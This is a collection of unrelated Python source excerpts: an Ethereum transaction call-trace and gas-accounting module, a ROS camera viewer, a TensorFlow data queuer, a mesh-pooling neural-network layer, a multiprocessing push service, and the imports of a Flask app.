pc = last["pc_map"][trace[i]["pc"]]
except (KeyError, TypeError):
# we don't have enough information about this contract
continue
if trace[i]["depth"] and opcode in ("RETURN", "REVERT", "INVALID", "SELFDESTRUCT"):
subcall: dict = next(
i for i in self._subcalls[::-1] if i["to"] == last["address"] # type: ignore
)
if opcode == "RETURN":
returndata = _get_memory(trace[i], -1)
if returndata:
fn = last["function"]
try:
return_values = fn.decode_output(returndata)
if len(fn.abi["outputs"]) == 1:
return_values = (return_values,)
subcall["return_value"] = return_values
except Exception:
subcall["returndata"] = returndata.hex()
else:
subcall["return_value"] = None
elif opcode == "SELFDESTRUCT":
subcall["selfdestruct"] = True
else:
if opcode == "REVERT":
data = _get_memory(trace[i], -1)
if len(data) > 4:
try:
subcall["revert_msg"] = decode_abi(["string"], data[4:])[0]
except Exception:
subcall["revert_msg"] = data.hex()
if "revert_msg" not in subcall and "dev" in pc:
subcall["revert_msg"] = pc["dev"]
if "path" not in pc:
continue
trace[i]["source"] = {"filename": last["path_map"][pc["path"]], "offset": pc["offset"]}
if "fn" not in pc:
continue
# calculate coverage
if last["coverage"]:
if pc["path"] not in coverage_eval[last["name"]]:
coverage_eval[last["name"]][pc["path"]] = [set(), set(), set()]
if "statement" in pc:
coverage_eval[last["name"]][pc["path"]][0].add(pc["statement"])
if "branch" in pc:
if pc["op"] != "JUMPI":
last["active_branches"].add(pc["branch"])
elif "active_branches" not in last or pc["branch"] in last["active_branches"]:
# false, true
key = 1 if trace[i + 1]["pc"] == trace[i]["pc"] + 1 else 2
coverage_eval[last["name"]][pc["path"]][key].add(pc["branch"])
if "active_branches" in last:
last["active_branches"].remove(pc["branch"])
# ignore jumps with no function - they are compiler optimizations
if "jump" in pc:
# jump 'i' is calling into an internal function
if pc["jump"] == "i":
try:
fn = last["pc_map"][trace[i + 1]["pc"]]["fn"]
except (KeyError, IndexError):
continue
if fn != last["internal_calls"][-1]:
last["internal_calls"].append(fn)
last["jumpDepth"] += 1
# jump 'o' is returning from an internal function
elif last["jumpDepth"] > 0:
del last["internal_calls"][-1]
last["jumpDepth"] -= 1
coverage._add_transaction(
self.coverage_hash, dict((k, v) for k, v in coverage_eval.items() if v)
)
def _add_internal_xfer(self, from_: str, to: str, value: str) -> None:
if not value.startswith("0x"):
value = f"0x{value}"
self._internal_transfers.append( # type: ignore
{"from": EthAddress(from_), "to": EthAddress(to), "value": Wei(value)}
)
def _full_name(self) -> str:
if self.contract_name and self.fn_name:
return f"{self.contract_name}.{self.fn_name}"
return self.fn_name or "Transaction"
def info(self) -> None:
"""Displays verbose information about the transaction, including decoded event logs."""
result = f"Tx Hash: {self.txid}\nFrom: {self.sender}\n"
if self.contract_address and self.status:
result += f"New {self.contract_name} address: {self.contract_address}\n"
else:
result += f"To: {self.receiver}\n" f"Value: {self.value}\n"
if self.input != "0x" and int(self.input, 16):
result += f"Function: {self._full_name()}\n"
result += (
f"Block: {self.block_number}\nGas Used: "
f"{self.gas_used} / {self.gas_limit} "
f"({self.gas_used / self.gas_limit:.1%})\n"
)
if self.events:
events = list(self.events)
call_tree: List = ["--------------------------"]
while events:
idx = next(
(events.index(i) for i in events if i.address != events[0].address), len(events)
)
contract = state._find_contract(events[0].address)
if contract:
try:
name = contract.name()
except Exception:
name = contract._name
sub_tree: List = [f"{name} ({events[0].address})"]
else:
sub_tree = [f"{events[0].address}"]
for event in events[:idx]:
sub_tree.append([event.name, *(f"{k}: {v}" for k, v in event.items())])
call_tree.append(sub_tree)
events = events[idx:]
event_tree = build_tree([call_tree], multiline_pad=0, pad_depth=[0, 1])
result = f"{result}\nEvents In This Transaction\n{event_tree}"
result = color.highlight(result)
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color})"
print(f"Transaction was Mined {status}\n---------------------\n{result}")
def _get_trace_gas(self, start: int, stop: int) -> Tuple[int, int]:
total_gas = 0
internal_gas = 0
is_internal = True
trace = self.trace
for i in range(start, stop):
# Check if we are in a subfunction or not
if is_internal and not _step_compare(trace[i], trace[start]):
is_internal = False
# For the internal gas tracking we ignore the gas passed to an external call
if trace[i]["depth"] > trace[start]["depth"]:
internal_gas -= trace[i - 1]["gasCost"]
elif not is_internal and _step_compare(trace[i], trace[start]):
is_internal = True
total_gas += trace[i]["gasCost"]
if is_internal:
internal_gas += trace[i]["gasCost"]
# manually add gas refunds where they occur
if trace[i]["op"] == "SSTORE" and int(trace[i]["stack"][-2], 16) == 0:
# 15000 gas is refunded if a word is set to 0x0
# Note: There is currently no way to check if the value was 0x0 before.
# This will give an incorrect refund if 0x0 is assigned to 0x0.
total_gas -= 15000
if is_internal:
internal_gas -= 15000
if trace[i]["op"] == "SELFDESTRUCT":
# 24000 gas is refunded on selfdestruct
total_gas -= 24000
if is_internal:
internal_gas -= 24000
# For external calls, add the remaining gas returned back
if start > 0 and trace[start]["depth"] > trace[start - 1]["depth"]:
total_gas += trace[start - 1]["gasCost"]
internal_gas += trace[start - 1]["gasCost"]
return internal_gas, total_gas
@trace_inspection
def call_trace(self, expand: bool = False) -> None:
"""
Display the complete sequence of contracts and methods called during
the transaction. The format:
Contract.functionName [instruction] start:stop [gas used]
* start:stop are index values for the `trace` member of this object,
showing the points where the call begins and ends
* for calls that include subcalls, gas use is displayed as
[gas used in this frame / gas used in this frame + subcalls]
* Calls displayed in red ended with a `REVERT` or `INVALID` instruction.
Arguments
---------
expand : bool
If `True`, show an expanded call trace including inputs and return values
"""
trace = self.trace
key = _step_internal(
trace[0], trace[-1], 0, len(trace), self._get_trace_gas(0, len(self.trace))
)
call_tree: List = [[key]]
active_tree: List = [call_tree[0]]
# (index, depth, jumpDepth) for relevent steps in the trace
trace_index = [(0, 0, 0)] + [
(i, trace[i]["depth"], trace[i]["jumpDepth"])
for i in range(1, len(trace))
if not _step_compare(trace[i], trace[i - 1])
]
subcalls = self.subcalls[::-1]
for i, (idx, depth, jump_depth) in enumerate(trace_index[1:], start=1):
last = trace_index[i - 1]
if depth == last[1] and jump_depth < last[2]:
# returning from an internal function, reduce tree by one
active_tree.pop()
continue
elif depth < last[1]:
# returning from an external call, return tree by jumpDepth of the previous depth
active_tree = active_tree[: -(last[2] + 1)]
continue
if depth > last[1]:
# called to a new contract
end = next((x[0] for x in trace_index[i + 1 :] if x[1] < depth), len(trace))
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_external(
trace[idx],
trace[end - 1],
idx,
end,
(total_gas, internal_gas),
subcalls.pop(),
expand,
)
elif depth == last[1] and jump_depth > last[2]:
# jumped into an internal function
end = next(
(
x[0]
for x in trace_index[i + 1 :]
if x[1] < depth or (x[1] == depth and x[2] < jump_depth)
),
len(trace),
)
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_internal(
trace[idx], trace[end - 1], idx, end, (total_gas, internal_gas)
)
active_tree[-1].append([key])
active_tree.append(active_tree[-1][-1])
print(
f"Call trace for '{color('bright blue')}{self.txid}{color}':\n"
f"Initial call cost [{color('bright yellow')}{self._call_cost} gas{color}]"
)
print(build_tree(call_tree).rstrip())
def traceback(self) -> None:
print(self._traceback_string() or "")
@trace_inspection
def _traceback_string(self) -> str:
"""Returns an error traceback for the transaction."""
if self.status == 1:
return ""
trace = self.trace
try:
idx = next(i for i in range(len(trace)) if trace[i]["op"] in ("REVERT", "INVALID"))
trace_range = range(idx, -1, -1)
except StopIteration:
return ""
try:
result = [next(i for i in trace_range if trace[i]["source"])]
except StopIteration:
return ""
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
while True:
try:
idx = next(
i
for i in trace_range
if trace[i]["depth"] < depth
or (trace[i]["depth"] == depth and trace[i]["jumpDepth"] < jump_depth)
)
result.append(idx)
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
except StopIteration:
break
return f"{color}Traceback for '{color('bright blue')}{self.txid}{color}':\n" + "\n".join(
self._source_string(i, 0) for i in result[::-1]
)
def error(self, pad: int = 3) -> None:
print(self._error_string(pad) or "")
@trace_inspection
def _error_string(self, pad: int = 3) -> str:
"""Returns the source code that caused the transaction to revert.
Args:
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
if self.status == 1:
return ""
# if RPC returned a program counter, try to find source without querying trace
if self._revert_pc:
highlight, linenos, path, fn_name = build._get_error_source_from_pc(self._revert_pc)
if highlight:
return _format_source(highlight, linenos, path, self._revert_pc, -1, fn_name)
self._revert_pc = None
# iterate backward through the trace until a step has a source offset
trace = self.trace
trace_range = range(len(trace) - 1, -1, -1)
try:
idx = next(i for i in trace_range if trace[i]["op"] in {"REVERT", "INVALID"})
idx = next(i for i in trace_range if trace[i]["source"])
return self._source_string(idx, pad)
except StopIteration:
return ""
def source(self, idx: int, pad: int = 3) -> None:
print(self._source_string(idx, pad) or "")
@trace_inspection
def _source_string(self, idx: int, pad: int) -> str:
"""Displays the associated source code for a given stack trace step.
Args:
idx: Stack trace step index
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
trace = self.trace[idx]
if not trace.get("source", None):
return ""
contract = state._find_contract(self.trace[idx]["address"])
source, linenos = highlight_source(
contract._sources.get(trace["source"]["filename"]), trace["source"]["offset"], pad
)
if not source:
return ""
return _format_source(
source,
linenos,
trace["source"]["filename"],
trace["pc"],
self.trace.index(trace),
trace["fn"],
)
def _format_source(source: str, linenos: Tuple, path: Path, pc: int, idx: int, fn_name: str) -> str:
ln = f" {color('bright blue')}{linenos[0]}"
if linenos[1] > linenos[0]:
ln = f"s{ln}{color('dark white')}-{color('bright blue')}{linenos[1]}"
return (
f"{color('dark white')}Trace step {color('bright blue')}{idx}{color('dark white')}, "
f"program counter {color('bright blue')}{pc}{color('dark white')}:\n {color('dark white')}"
f"File {color('bright magenta')}\"{path}\"{color('dark white')}, line{ln}"
f"{color('dark white')}, in {color('bright cyan')}{fn_name}{color('dark white')}:{source}"
)
def _step_compare(a: Dict, b: Dict) -> bool:
return a["depth"] == b["depth"] and a["jumpDepth"] == b["jumpDepth"]
def _step_internal(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict = None,
) -> str:
if last_step["op"] in {"REVERT", "INVALID"} and _step_compare(step, last_step):
contract_color = color("bright red")
else:
contract_color = color("bright cyan") if not step["jumpDepth"] else color()
key = f"{color('dark white')}{contract_color}{step['fn']} {color('dark white')}"
left_bracket = f"{color('dark white')}["
right_bracket = f"{color('dark white')}]"
if subcall:
key = f"{key}[{color}{subcall['op']}{right_bracket} "
key = f"{key}{start}:{stop}{color}"
if gas:
if gas[0] == gas[1]:
gas_str = f"{color('bright yellow')}{gas[0]} gas"
else:
gas_str = f"{color('bright yellow')}{gas[0]} / {gas[1]} gas"
key = f"{key} {left_bracket}{gas_str}{right_bracket}{color}"
if last_step["op"] == "SELFDESTRUCT":
key = f"{key} {left_bracket}{color('bright red')}SELFDESTRUCT{right_bracket}{color}"
return key
def _convert_0x_to_empty_bytes(value: Any) -> Any:
# black cannot parse `0x` without any trailing zeros, so we temporarily
# replace it with an empty bytestring
final = []
for item in value:
if isinstance(item, (list, tuple)):
final.append(_convert_0x_to_empty_bytes(item))
elif str(item) == "0x":
final.append(b"")
else:
final.append(item)
return type(value)(final)
def _format(value: Any) -> str:
if isinstance(value, (list, tuple)):
value = _convert_0x_to_empty_bytes(value)
mode = black.FileMode(line_length=60)
value = black.format_str(str(value), mode=mode).replace('b""', "0x")
return str(value)
def _step_external(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict,
expand: bool,
) -> str:
key = _step_internal(step, last_step, start, stop, gas, subcall)
if not expand:
return key
result: List = [key, f"address: {step['address']}"]
if "value" in subcall:
result.append(f"value: {subcall['value']}")
if "inputs" not in subcall:
result.append(f"calldata: {subcall.get('calldata')}")
elif subcall["inputs"]:
result.append(
["input arguments:", *(f"{k}: {_format(v)}" for k, v in subcall["inputs"].items())]
)
else:
result.append("input arguments: None")
if "return_value" in subcall:
value = subcall["return_value"]
if isinstance(value, tuple) and len(value) > 1:
result.append(["return values:", *(_format(i) for i in value)])
else:
if isinstance(value, tuple):
value = value[0]
result.append(f"return value: {_format(value)}")
elif "returndata" in subcall:
result.append(f"returndata: {subcall['returndata']}")
if "revert_msg" in subcall:
result.append(f"revert reason: {color('bright red')}{subcall['revert_msg']}{color}")
return build_tree([result], multiline_pad=0).rstrip()
def _get_memory(step: Dict, idx: int) -> HexBytes:
offset = int(step["stack"][idx], 16)
length = int(step["stack"][idx - 1], 16)
data = HexBytes("".join(step["memory"]))[offset : offset + length]
# append zero-bytes if allocated memory ends before `length` bytes
data = HexBytes(data + b"\x00" * (length - len(data)))
return data
def _get_last_map(address: EthAddress, sig: str) -> Dict:
contract = state._find_contract(address)
last_map = {"address": EthAddress(address), "jumpDepth": 0, "name": None, "coverage": False}
if contract:
if contract.get_method(sig):
full_fn_name = f"{contract._name}.{contract.get_method(sig)}"
else:
full_fn_name = contract._name
last_map.update(
contract=contract,
function=contract.get_method_object(sig),
name=contract._name,
internal_calls=[full_fn_name],
path_map=contract._build.get("allSourcePaths"),
pc_map=contract._build.get("pcMap"),
)
if isinstance(contract._project, project_main.Project):
# only evaluate coverage for contracts that are part of a `Project`
last_map["coverage"] = True
if contract._build.get("language") == "Solidity":
last_map["active_branches"] = set()
else:
last_map.update(contract=None, internal_calls=[f"<UnknownContract>.{sig}"], pc_map=None)
return last_map
def _is_call_to_precompile(subcall: dict) -> bool:
precompile_contract = re.compile(r"0x0{38}(?:0[1-9]|1[0-8])")
return True if precompile_contract.search(str(subcall["to"])) is not None else False
|
read_img.py
|
import rospy
import numpy as np
from sensor_msgs.msg import Image
import cv2
from threading import Thread
def callback(image):
byte_image = image.data
np_image = np.frombuffer(byte_image,dtype=np.uint8)
bgra_image = np_image.reshape((image.height,image.width,4))
bgr_image = cv2.cvtColor(bgra_image,cv2.COLOR_BGRA2BGR)
cv2.imshow("Camera Front",bgr_image)
cv2.waitKey(10)
if __name__ == "__main__":
rospy.init_node('camera', anonymous=True)
rospy.Subscriber("/lka/detected_image", Image, callback)
Thread(target=rospy.spin()).start()
|
DataQueuer.py
|
import tensorflow as tf
import numpy as np
import threading
from scipy import misc
from random import randint
import itertools
import pre_processor
class DataQueuer(object):
"""
Manages the concurrent fetching of data on the cpu onto the gpu
does not guarantee that images are appended in order
"""
def __init__(self,data_readers, pre_processors=[],n_threads=1,random_fetch = True):
self.n_threads = n_threads
self.random_fetch = random_fetch
self.data_readers = data_readers
with tf.variable_scope(None,default_name="queuer"):
# ensure all readers have the same number of data
self.n_data = data_readers[0].n_data
self.next_data = 0
for reader in data_readers:
assert self.n_data == reader.n_data, "readers do not read the same number of data"
assert len(data_readers) == len(pre_processors), "number of pre_processor sets not equal number of data readers"
# thread lock
self.lock = threading.Lock()
# get outputs from readers
data_outputs = []
data_shapes = []
data_types = []
for it,reader in enumerate(data_readers):
# pass reader through proprocessor
processorList = pre_processors[it]
curDataSource = reader.data_out
curDataShape = reader.data_shape
curDataType = reader.data_type
for proc in processorList:
curDataSource = proc.attach_graph(curDataSource)
curDataShape = proc.get_data_shape(curDataShape)
curDataType = proc.get_data_type(curDataType)
data_outputs.append(curDataSource)
data_shapes.append(curDataShape)
data_types.append(curDataType)
#queue
self.queue = tf.FIFOQueue(shapes=data_shapes, dtypes=data_types, capacity=n_threads*8)
self.enqueue_op = self.queue.enqueue(data_outputs)
def close(self,sess):
close_op = self.queue.close(cancel_pending_enqueues=True)
sess.run(close_op)
for thread in self.threads:
thread.join()
def get_next_data_index(self):
with self.lock:
index = self.next_data
self.next_data += 1
if self.next_data >= self.n_data:
self.next_data = 0
return index
def get_next_data_index_random(self):
with self.lock:
index = randint(0,self.n_data-1)
return index
def thread_main(self, sess):
while True:
if self.random_fetch:
index = self.get_next_data_index_random()
else:
index = self.get_next_data_index()
#get feed dicts from readers
feed_dict = {}
for reader in self.data_readers:
feed_dict.update(reader.get_feed_dict(index))
try:
sess.run([self.enqueue_op],feed_dict=feed_dict)
except tf.errors.CancelledError:
exit()
def start_queueing(self,sess):
self.threads = []
for i in range(self.n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True
self.threads.append(thread)
thread.start()
|
mesh_pool.py
|
import torch
import torch.nn as nn
from threading import Thread
from models.layers.mesh_union import MeshUnion
import numpy as np
from heapq import heappop, heapify
from .mesh_rotation_utils import *
class MeshPool(nn.Module):
def __init__(self, target, multi_thread=False):
super(MeshPool, self).__init__()
self.__out_target = target
self.__multi_thread = multi_thread
self.__fe = None
self.__updated_fe = []
self.__meshes = None
self.__merge_edges = [-1, -1]
def __call__(self, fe, meshes):
return self.forward(fe, meshes)
def forward(self, fe, meshes):
self.__updated_fe = [[] for _ in range(len(meshes))]
pool_threads = []
self.__fe = fe
self.__meshes = meshes
# iterate over batch
for mesh_index in range(len(meshes)):
if self.__multi_thread:
pool_threads.append(
Thread(target=self.__pool_main, args=(mesh_index,)))
pool_threads[-1].start()
else:
self.__pool_main(mesh_index)
if self.__multi_thread:
for mesh_index in range(len(meshes)):
pool_threads[mesh_index].join()
a = self.__updated_fe
out_features = torch.cat(self.__updated_fe).view(len(meshes), -1,
self.__out_target)
return out_features
def __pool_main(self, mesh_index):
mesh = self.__meshes[mesh_index]
queue = self.__build_queue(self.__fe[mesh_index, :, :mesh.edges_count],
mesh.edges_count)
# print('pooling target - %d, mesh filename: %s' % (self.__out_target, mesh.filename))
last_count = mesh.edges_count + 1
mask = np.ones(mesh.edges_count, dtype=np.bool)
edge_groups = MeshUnion(mesh.edges_count, self.__fe.device)
while mesh.edges_count > self.__out_target:
value, edge_id = heappop(queue)
edge_id = int(edge_id)
# print('pool edge_id %d' % edge_id)
if mask[edge_id]:
status = self.__pool_edge(mesh, edge_id, mask, edge_groups)
mesh.clean(mask, edge_groups)
fe = edge_groups.rebuild_features(self.__fe[mesh_index], mask,
self.__out_target)
self.__updated_fe[mesh_index] = fe
# print('finish pooling')
def __pool_edge(self, mesh, edge_id, mask, edge_groups):
"""
This function implements edge pooling algorithm:
1. Clean mesh configuration from doublet edges and singlet edges.
2. For a non-boundary edge check if:
2.1. First edge side is "clean".
2.2. Second edge side is "clean".
2.3. edge one-ring neighborhood is.
3. Run edge collapse algorithm.
Args:
mesh (Mesh): mesh structure input (will be updated during the
process).
edge_id (int): edge identification number in the mesh.
mask: (ndarray): array of boolean values which indicates if an edge
aleady been removed.
edge_groups (MeshUnion): mesh union structure of edge groups in-
order to keep track of edge features
combinations.
Returns:
status (bool) - True if pool_edge algorithm succeeded,
False otherwise.
"""
# 1. Pool mesh operations
self.pool_mesh_operations(mesh, mask, edge_groups)
# Check if edge_id have boundaries
if self.has_boundaries(mesh, edge_id):
return False
# 2. Check edge configuration validity
if self.__clean_side(mesh, edge_id, 0) \
and self.__clean_side(mesh, edge_id, 3) \
and self.__is_one_ring_valid(mesh, edge_id):
# 3. Edge collapse algorithm
status = self.edge_collapse(edge_id, mesh, mask, edge_groups)
self.pool_mesh_operations(mesh, mask, edge_groups)
return status
else:
return False
def edge_collapse(self, edge_id, mesh, mask, edge_groups):
"""
This function implements edge collapse algorithm inspired by the paper:
"Practical quad mesh simplification" Tarini et al.
The algorithm goes as follows:
1. Extract edge mesh information (for each vertex extract edge
connections and their vertices).
2. Check if the edges connected to u and v have boundaries.
3. Rotate the edges connected to u and re-build their neighborhood.
4. Perform diagonal collapse from v to u - collapse the two edges from
the original edge_id neighborhood which are connected to v and
reconnect all the other edges connected to v with u. Re-build all
edges neighborhood.
5. Union edges groups according to new feature edges combinations.
"""
# 1. Get edge info
u, v_e_u, e_u, v, v_e_v, e_v = get_edge_hood_info(mesh, edge_id)
# 2. Check if u and v edges are with boundaries
correct_config, u, v_e_u, e_u, v, v_e_v, e_v = \
check_u_v_boundaries(mesh, u, v_e_u, e_u, v, v_e_v, e_v)
if not correct_config:
return False
# 3. Edges rotations around vertex u
mesh, new_features_combination_dict, diag_vertices = \
edge_rotations(u, e_u, v_e_u, mesh)
if diag_vertices is None:
return False
# 3. collapse another 2 edges connected to the other vertex v and
# reconnect other edges from v connection to u connection
e_v = mesh.ve[v].copy() # edges connected to vertex v
self.collapse_other_vertex_v(mesh, u, v, e_v, diag_vertices,
new_features_combination_dict,
edge_groups, mask)
# 4. union edge groups
MeshPool.__union_groups_at_once(mesh, edge_groups,
new_features_combination_dict)
return True
def collapse_other_vertex_v(self, mesh, u, v, e_v, diag_vertices,
new_features_combination_dict, edge_groups,
mask):
"""
This function implements the diagonal collapse from vertex v to vertex
u according to the following steps:
1. Check if vertex v is a doublet edges configuration.
If it is - clear the doublet and return (no other collapse is
needed).
2. Collapse (and finally remove) the 2 edges connected to v in the
original neighborhood of edge_id.
3. Re-connect all the other edges connected to v with u
4. Re-build all relevant edges neighborhoods.
"""
if self.pool_doublets(mesh, mask, edge_groups, [v]):
return
old_mesh = deepcopy(mesh)
e_to_collapse = [] # edges we should remove
collapsed_e_to_orig_e_dict = dict() # to which edge the collpased edge combined with
e_to_reconnect_with_u = [] # edges we should re-connect with vertex u
for e in e_v:
u_e, v_e = mesh.edges[e, :]
if u_e == v: # make sure u_e is the other vertex
u_e = v_e
v_e = v
# if it is an edge of the closet hood
if u_e in diag_vertices or v_e in diag_vertices:
e_to_collapse.append(e)
for key in new_features_combination_dict.keys():
if u_e in mesh.edges[key]:
edge_to_add_feature = key
new_features_combination_dict[key].append(e)
collapsed_e_to_orig_e_dict[e] = key
break
# collapse
self.remove_edge(mesh, e, edge_groups, mask)
else:
e_to_reconnect_with_u.append(e)
mesh.ve[v].remove(e)
mesh.ve[u].append(e)
if mesh.edges[e, 0] == v:
mesh.edges[e, 0] = u
else:
mesh.edges[e, 1] = u
# fix hood for edges which re-connected to u
already_built_edges_hood = []
for e in e_to_reconnect_with_u:
hood = old_mesh.gemm_edges[e]
edges_to_check = [e] + list(hood)
for edge in edges_to_check:
if edge in already_built_edges_hood or edge in e_to_collapse:
continue
already_built_edges_hood.append(edge)
old_hood = old_mesh.gemm_edges[edge]
new_hood = mesh.gemm_edges[edge]
# replace any e_to_collapse edge by the matched edge
for e_collapse in e_to_collapse:
if np.any([h == e_collapse for h in old_hood]):
e_collapse_pos = \
np.where([h == e_collapse for h in old_hood])[0][0]
new_hood[e_collapse_pos] = collapsed_e_to_orig_e_dict[
e_collapse]
# now fix hood for the rotated edges
for key in collapsed_e_to_orig_e_dict:
edge = collapsed_e_to_orig_e_dict[key]
old_hood = old_mesh.gemm_edges[edge]
new_hood = mesh.gemm_edges[edge]
already_built_edges_hood.append(edge)
if key in old_hood[0:3]:
if edge not in old_mesh.gemm_edges[key, 0:3]:
new_hood[0:3] = old_mesh.gemm_edges[key, 0:3]
else:
new_hood[0:3] = old_mesh.gemm_edges[key, 3:6]
elif key in old_hood[3:6]:
if edge not in old_mesh.gemm_edges[key, 0:3]:
new_hood[3:6] = old_mesh.gemm_edges[key, 0:3]
else:
new_hood[3:6] = old_mesh.gemm_edges[key, 3:6]
else:
assert (False)
for i, e in enumerate(new_hood):
if e in collapsed_e_to_orig_e_dict.keys():
new_hood[i] = collapsed_e_to_orig_e_dict[e]
# fix hood order:
fix_mesh_hood_order(mesh, already_built_edges_hood)
# fix sides
fix_mesh_sides(mesh, already_built_edges_hood)
# merge vertex v with vertex u
mesh.merge_vertices(u, v)
return
def pool_mesh_operations(self, mesh, mask, edge_groups):
"""
This function implements the mesh cleaning process. In-order to keep
mesh with valid connectivity and without edge neighborhoods ambiguities
we keep mesh clear from "doublet" and "singlet" (TBD) edges.
"""
# clear doublets and build new hood
doublet_cleared = self.pool_doublets(mesh, mask, edge_groups)
while doublet_cleared:
doublet_cleared = self.pool_doublets(mesh, mask, edge_groups)
# TBD
# clear singlets and build new hood
# clear_singlets(mesh, mask, edge_groups)
return
def pool_doublets(self, mesh, mask, edge_groups, vertices=None):
"""
This function finds doublet configuration and removes it from the mesh.
Args:
mesh (Mesh): mesh structure
mask (ndarray): array of boolean which indicates which edge removed
edge_groups (MeshUnion): mesh union strcture contain all edges
groups of edge features combinations.
vertices (list, optional): if not None, check only this list of
vertices in the mesh.
Otherwise - check all mesh.
Returns:
boolean - True if doublet found and removed.
False - otherwise.
"""
doublet_vertices, doublet_pairs_edges = find_doublets(mesh, vertices)
if len(doublet_vertices) == 0:
return False
for pair in doublet_pairs_edges:
doubelt_to_replaced_edge, doubelt_to_replaced_edge_other_side = \
clear_doublet_pair(mesh, mask, pair)
# union groups for features
for key in doubelt_to_replaced_edge.keys():
MeshPool.__union_groups(mesh, edge_groups, key,
doubelt_to_replaced_edge[key])
# union groups for features
for key in doubelt_to_replaced_edge_other_side.keys():
MeshPool.__union_groups(mesh, edge_groups, key,
doubelt_to_replaced_edge_other_side[
key])
for e in pair:
MeshPool.__remove_group(mesh, edge_groups, e)
return True
@staticmethod
def remove_edge(mesh, e, edge_groups, mask):
"""
Removes an edge:
Remove it from edge groups (MeshUnion structure)
Indicate it in the "mask" array
Remove it from the mesh structure.
"""
MeshPool.__remove_group(mesh, edge_groups, e)
mask[e] = False
mesh.remove_edge(e)
mesh.edges[e] = [-1, -1]
mesh.edges_count -= 1
mesh.gemm_edges[e] = [-1, -1, -1, -1, -1, -1]
def __clean_side(self, mesh, edge_id, side):
"""
Checks how many shared items have each pair neighborhood edge of
edge_id (specific side) in their neighborhood.
"""
if mesh.edges_count <= self.__out_target:
return False
info = MeshPool.__get_face_info(mesh, edge_id, side)
key_a, key_b, key_c, side_a, side_b, side_c, \
other_side_a, other_side_b, other_side_c, \
other_keys_a, other_keys_b, other_keys_c = info
shared_items_ab = MeshPool.__get_shared_items(other_keys_a,
other_keys_b)
shared_items_ac = MeshPool.__get_shared_items(other_keys_a,
other_keys_c)
shared_items_bc = MeshPool.__get_shared_items(other_keys_b,
other_keys_c)
if len(shared_items_ab) <= 2 and len(shared_items_ac) <= 2 and \
len(shared_items_bc) <= 2:
return True
else:
assert (
False) # TODO: we shouldn't get here.
return False
@staticmethod
def has_boundaries(mesh, edge_id):
for edge in mesh.gemm_edges[edge_id]:
if edge == -1 or -1 in mesh.gemm_edges[edge]:
return True
return False
@staticmethod
def __get_v_n(mesh, edge_id):
return set(mesh.edges[mesh.ve[mesh.edges[edge_id, 0]]].reshape(-1)), \
set(mesh.edges[mesh.ve[mesh.edges[edge_id, 1]]].reshape(-1)),
def __is_one_ring_valid(self, mesh, edge_id):
"""
Checks edge_id one-ring edges neighborhood is valid, i.e. only 4
vertices can be shared from each side of the edge_id.
"""
e_a = mesh.ve[mesh.edges[edge_id, 0]]
e_b = mesh.ve[mesh.edges[edge_id, 1]]
v_a = set() # set of all neighbor + diagonal vertices of first edge vertex
v_b = set() # set of all neighbor + diagonal vertices of second edge vertex
for e in e_a:
if not e == edge_id:
v_aa, v_ab = self.__get_v_n(mesh, e)
v_a = set.union(set.union(v_aa, v_ab), v_a)
for e in e_b:
if not e == edge_id:
v_ba, v_bb = self.__get_v_n(mesh, e)
v_b = set.union(set.union(v_ba, v_bb), v_b)
shared = v_a & v_b - set(mesh.edges[edge_id])
return len(shared) == 4
@staticmethod
def __get_shared_items(list_a, list_b):
shared_items = []
for i in range(len(list_a)):
for j in range(len(list_b)):
if list_a[i] == list_b[j]:
shared_items.extend([i, j])
return shared_items
@staticmethod
def __get_face_info(mesh, edge_id, side):
key_a = mesh.gemm_edges[edge_id, side]
key_b = mesh.gemm_edges[edge_id, side + 1]
key_c = mesh.gemm_edges[edge_id, side + 2]
side_a = mesh.sides[edge_id, side]
side_b = mesh.sides[edge_id, side + 1]
side_c = mesh.sides[edge_id, side + 2]
other_side_a = (side_a - (side_a % 3) + 3) % 6
other_side_b = (side_b - (side_b % 3) + 3) % 6
other_side_c = (side_c - (side_c % 3) + 3) % 6
other_keys_a = [mesh.gemm_edges[key_a, other_side_a],
mesh.gemm_edges[key_a, other_side_a + 1],
mesh.gemm_edges[key_a, other_side_a + 2]]
other_keys_b = [mesh.gemm_edges[key_b, other_side_b],
mesh.gemm_edges[key_b, other_side_b + 1],
mesh.gemm_edges[key_b, other_side_b + 2]]
other_keys_c = [mesh.gemm_edges[key_c, other_side_c],
mesh.gemm_edges[key_c, other_side_c + 1],
mesh.gemm_edges[key_c, other_side_c + 2]]
return key_a, key_b, key_c, side_a, side_b, side_c, \
other_side_a, other_side_b, other_side_c, \
other_keys_a, other_keys_b, other_keys_c
@staticmethod
def __build_queue(features, edges_count):
# delete edges with smallest norm
squared_magnitude = torch.sum(features * features, 0)
if squared_magnitude.shape[-1] != 1:
squared_magnitude = squared_magnitude.unsqueeze(-1)
edge_ids = torch.arange(edges_count, device=squared_magnitude.device,
dtype=torch.float32).unsqueeze(-1)
heap = torch.cat((squared_magnitude, edge_ids), dim=-1).tolist()
heapify(heap)
return heap
@staticmethod
def __union_groups(mesh, edge_groups, source, target):
edge_groups.union(source, target)
mesh.union_groups(source, target)
@staticmethod
def __union_groups_at_once(mesh, edge_groups, targets_to_sources_dict):
edge_groups.union_groups(targets_to_sources_dict)
for target in targets_to_sources_dict.keys():
for source in targets_to_sources_dict[target]:
if target is not source:
mesh.union_groups(source, target)
@staticmethod
def __remove_group(mesh, edge_groups, index):
edge_groups.remove_group(index)
mesh.remove_group(index)
|
pushService.py
|
#!/usr/bin/python
from multiprocessing import Process, Queue
from pushSocket import pushSocket
from pushWork import pushWork
queue = Queue()
socket_proc = Process(target=pushSocket, args=(queue,))
work_proc = Process(target=pushWork, args=(queue,))
socket_proc.start()
work_proc.start()
|
mamajenkins.py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import json
import threading
import requests
import datetime
import socket
from collections import defaultdict
from init import app
from flask import render_template, request
